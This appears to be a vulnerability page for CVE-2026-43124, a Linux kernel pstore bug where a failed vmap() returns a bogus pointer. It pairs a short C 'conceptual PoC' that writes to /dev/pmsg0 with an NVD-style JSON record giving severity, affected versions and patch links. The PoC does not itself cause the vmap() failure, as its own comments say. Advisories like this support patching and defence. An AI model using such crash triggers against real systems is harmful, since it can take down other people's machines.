CVE-2026-43124

/* * Conceptual PoC for CVE-2026-43124 * This demonstrates the logic flaw in persistent_ram_vmap. * Requires a vulnerable kernel build. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> int main() { int fd; // Attempt to interact with pstore (ramoops) // Note: This requires CONFIG_PSTORE_RAM enabled and proper setup. fd = open("/dev/pmsg0", O_RDWR); if (fd < 0) { perror("Failed to open pmsg0. Device might not exist."); return 1; } // In a real scenario, one would need to induce memory pressure // to cause vmap() to fail inside the kernel. // Then triggering a write might hit the incorrect return path. char *trigger_data = "Crash trigger data"; write(fd, trigger_data, 20); printf("Data written. If vmap failed and offset != 0, kernel may crash on access.\n"); close(fd); return 0; }

{"cve": {"id": "CVE-2026-43124", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:29.313", "lastModified": "2026-05-08T18:02:22.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore: ram_core: fix incorrect success return when vmap() fails\n\nIn persistent_ram_vmap(), vmap() may return NULL on failure.\n\nIf offset is non-zero, adding offset_in_page(start) causes the function\nto return a non-NULL pointer even though the mapping failed.\npersistent_ram_buffer_map() therefore incorrectly returns success.\n\nSubsequent access to prz->buffer may dereference an invalid address\nand cause crashes.\n\nAdd proper NULL checking for vmap() failures."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16.62", "versionEndExcluding": "5.10.252", "matchCriteriaId": "60A2158E-664E-490E-AC28-0DFD1C0680CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/05363abc7625cf18c96e67f50673cd07f11da5e9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1da904e84de608907662ad8a51ba9c571d61e003", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2c99326dc1c79b7ce3c8dd92929b5ce724ff70eb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/49918dd52615097529811d21ec6074dd02ebe77c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/88d5b28f63c7aac1271784e3b800ed405d1cde75", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8baa234181f632cabacf73e4834a910859e9fcc9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d849adfbc3e98417fb541620568db1a759ef441", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d47234840aeb4182ed3ee795c578b1dfa9cbd25b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}